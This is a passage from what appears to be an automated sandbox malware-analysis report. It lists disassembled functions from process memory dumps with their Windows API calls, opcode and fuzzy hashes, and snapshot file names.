                                                  • Opcode Fuzzy Hash: 833557c5644a7fb8071b53c4cf23fbeffc91d2cef9ce461e51fe2985cba3f6f0
                                                  • Instruction Fuzzy Hash: A0F14B30E00349CFDB54DFA9C844B9DFBF2BF88314F568559E819AB265DBB0A945CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  [Control-flow graph rendered as an image in the original report. Recoverable from the serialised graph: function at 0xedac80, basic blocks 0xedac80-0xedae5d, internal call to 0xedae5f, API calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId in that order. The executed/not-executed colouring of the original is not recoverable in text.]
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00EDAD0E
                                                  • GetCurrentThread.KERNEL32 ref: 00EDAD4B
                                                  • GetCurrentProcess.KERNEL32 ref: 00EDAD88
                                                  • GetCurrentThreadId.KERNEL32 ref: 00EDADE1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745890984.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_ed0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 302af41989e0369649439c47662b862cf1d0c511f795efda8e32d440ce6ce73f
                                                  • Instruction ID: d076939d6ce6a71b5007f32032904b45ed0a2b050838c3cffd6a66a7806b285d
                                                  • Opcode Fuzzy Hash: 302af41989e0369649439c47662b862cf1d0c511f795efda8e32d440ce6ce73f
                                                  • Instruction Fuzzy Hash: DD5169B090034A8FDB14DFAAD548BAEBBF1FF88305F248059D509A73A0D774A945CF66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  [Control-flow graph rendered as an image in the original report. Recoverable from the serialised graph: function at 0xedac90, basic blocks 0xedac90-0xedae5d, internal call to 0xedae5f, API calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId in that order (same body as the 0xedac80 entry above, different entry point). The executed/not-executed colouring of the original is not recoverable in text.]
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00EDAD0E
                                                  • GetCurrentThread.KERNEL32 ref: 00EDAD4B
                                                  • GetCurrentProcess.KERNEL32 ref: 00EDAD88
                                                  • GetCurrentThreadId.KERNEL32 ref: 00EDADE1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745890984.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_ed0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: e61cc9fa7021d4c81283d6a96a7d59d4326d7ee8883bcc7358753559b9c7c1ae
                                                  • Instruction ID: 381601b792c5a76765b2c022c070caa1edeaf84bf3f96113d959ace4819194d3
                                                  • Opcode Fuzzy Hash: e61cc9fa7021d4c81283d6a96a7d59d4326d7ee8883bcc7358753559b9c7c1ae
                                                  • Instruction Fuzzy Hash: 685169B090034A8FDB14DFAAD448BAEBBF1EF88315F248019D509B77A0D774A945CF66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  [Control-flow graph rendered as an image in the original report. Recoverable from the serialised graph: function at 0x61500e5, basic blocks 0x61500e5-0x6150261, API call CreateWindowExW in block 0x6150173. The executed/not-executed colouring of the original is not recoverable in text.]
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06150202
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 00976eb1c774c17740747f3f9435fa0516cea33225e70700608ada66cb3beb8d
                                                  • Instruction ID: 28da8366fa469f29972004dc821ef5adeba9112778f943ac6656f9ff5cfae860
                                                  • Opcode Fuzzy Hash: 00976eb1c774c17740747f3f9435fa0516cea33225e70700608ada66cb3beb8d
                                                  • Instruction Fuzzy Hash: 1851BDB5D00309DFDB14CFA9C984ADEFBB5BF48310F25812AE818AB210D7759945CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  [Control-flow graph rendered as an image in the original report. Recoverable from the serialised graph: function at 0x61500f0, basic blocks 0x61500f0-0x6150261, API call CreateWindowExW in block 0x6150173 (same body as the 0x61500e5 entry above, different entry point). The executed/not-executed colouring of the original is not recoverable in text.]
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06150202
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: e5ed0f6ad5f0586b18c7b8e1c073d0402a67cf68adfdef064a5fac49e316b936
                                                  • Instruction ID: 9e2b30c674d282057fe5ef5711007fcae55f25379501b62371849e195d6fdf9a
                                                  • Opcode Fuzzy Hash: e5ed0f6ad5f0586b18c7b8e1c073d0402a67cf68adfdef064a5fac49e316b936
                                                  • Instruction Fuzzy Hash: 5B41B0B1D00349DFDB14CFAAC884ADEFBB5BF88310F25812AE818AB210D7759945CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  [Control-flow graph rendered as an image in the original report. Recoverable from the serialised graph: function at 0x6150414, basic blocks 0x6150414-0x6152bcc, API call CallWindowProcW in block 0x6152b4a. The executed/not-executed colouring of the original is not recoverable in text.]
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 06152B71
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 3f079db067893937a638a35a5ff49b24fb04433c2acd8ae8488ce421150d63db
                                                  • Instruction ID: d5617ad88544beba8574e297744757e7ccf931440757b59fe03e5b6e62a07a49
                                                  • Opcode Fuzzy Hash: 3f079db067893937a638a35a5ff49b24fb04433c2acd8ae8488ce421150d63db
                                                  • Instruction Fuzzy Hash: 9E4129B9A00309CFDB14DF59C888AAAFBF5FB88314F25C459D519A7321D774A941CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  [Control-flow graph rendered as an image in the original report. Recoverable from the serialised graph: function at 0xedaed0, basic blocks 0xedaed0-0xedaf92, API call DuplicateHandle in block 0xedaed0. The executed/not-executed colouring of the original is not recoverable in text.]
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EDAF5F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745890984.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_ed0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 36a016d455593f722ec40c20ee64a2d342db02b2a0e54fce1f6feb6b83ade63c
                                                  • Instruction ID: e51172c56e6690818d1c8542e9daac645ed6da21fc18268dda41518a4b7a4eeb
                                                  • Opcode Fuzzy Hash: 36a016d455593f722ec40c20ee64a2d342db02b2a0e54fce1f6feb6b83ade63c
                                                  • Instruction Fuzzy Hash: 4A21F4B5D002499FDB10CFAAD484ADEBFF4EB48320F14801AE954A3350D374A941CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  [Control-flow graph rendered as an image in the original report. Recoverable from the serialised graph: function at 0xedaed8, basic blocks 0xedaed8-0xedaf92, API call DuplicateHandle in block 0xedaed8 (same body as the 0xedaed0 entry above, different entry point). The executed/not-executed colouring of the original is not recoverable in text.]
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EDAF5F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745890984.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_ed0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 9f1804b068e1b1b672fc4638a5d5c67bd40093c6e9cd5408c45ca8055f0c7f8c
                                                  • Instruction ID: 28c3bae3aa3ca2d3c51a0ea7271f4d3be4811815815b1e160765556b8e39c232
                                                  • Opcode Fuzzy Hash: 9f1804b068e1b1b672fc4638a5d5c67bd40093c6e9cd5408c45ca8055f0c7f8c
                                                  • Instruction Fuzzy Hash: 3521B3B59002499FDB10CFAAD884ADEBBF9EB48710F14841AE914A3350D378A955CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  [Control-flow graph rendered as an image in the original report. Recoverable from the serialised graph: function at 0x6154ff0, basic blocks 0x6154ff0-0x6155080, API call OleInitialize in block 0x6154ff8. The executed/not-executed colouring of the original is not recoverable in text.]
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 0615504D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: a71e48868d1f4fd6962237209a5dc622f6973258cc82941c63dcd00ff8052d46
                                                  • Instruction ID: c10b33a60a46498f7b8cd17d63c5edeeec097c834a7ed12c56ddd755936b02c5
                                                  • Opcode Fuzzy Hash: a71e48868d1f4fd6962237209a5dc622f6973258cc82941c63dcd00ff8052d46
                                                  • Instruction Fuzzy Hash: FC1106B5800349CFDB20DFAAD844BCEFFF8AB48224F24845AD558A7210D379A544CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 0615504D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2751559834.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_6150000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 99f9fa2b3688c225a4223dc82c1570687f86d1e3944926a1c5e4fbd64e711ada
                                                  • Instruction ID: b57b7f49e9d1db5e208729411ba0b17751864a4a736e0f8b87036316fe8481e3
                                                  • Opcode Fuzzy Hash: 99f9fa2b3688c225a4223dc82c1570687f86d1e3944926a1c5e4fbd64e711ada
                                                  • Instruction Fuzzy Hash: AA1133B4800349CFDB20DFAAD484B9EFBF4EB48224F20841AD528A3200C778A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745314546.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_e0d000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f2743064614a79b7171a4be84a74950e33d99cd1d87e5c9cc769ddb566cce1c
                                                  • Instruction ID: e1d6ce6581eba24d3d9b2845404267e8d12bbaab98425ae784b053932cefcf32
                                                  • Opcode Fuzzy Hash: 2f2743064614a79b7171a4be84a74950e33d99cd1d87e5c9cc769ddb566cce1c
                                                  • Instruction Fuzzy Hash: 4F21D075608304DFDB14DF54D984B16BB66FB84328F20C569D84E5B286C33AD887CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745314546.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_e0d000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 170db237b2d36619eebe5bfcde8d2880bdd5ad2fdeea6ac6b8bf807eed1f493a
                                                  • Instruction ID: cac9da8954b2a968820b44a9ab87d76900bff9ff1deaa03f85abc650a2d63929
                                                  • Opcode Fuzzy Hash: 170db237b2d36619eebe5bfcde8d2880bdd5ad2fdeea6ac6b8bf807eed1f493a
                                                  • Instruction Fuzzy Hash: 0D21537550D3808FC712CF64D994715BF72EB46314F28C5DAD8498B6A7C33A984ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2745135646.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_ced000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b9a1c2b3deda6dfdbe702e8f5d5408e53906bd36f7433048d717908a4d16ec3
                                                  • Instruction ID: 1458d81d0316a7cb4bad9ea375dcc525b066d1558c271f45fce6e74f84fe6e6b
                                                  • Opcode Fuzzy Hash: 1b9a1c2b3deda6dfdbe702e8f5d5408e53906bd36f7433048d717908a4d16ec3
                                                  • Instruction Fuzzy Hash: 40F0C2714043849EE7208A16C884B62FFECEF41734F18C45AFD1D4A287C2799844CAB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%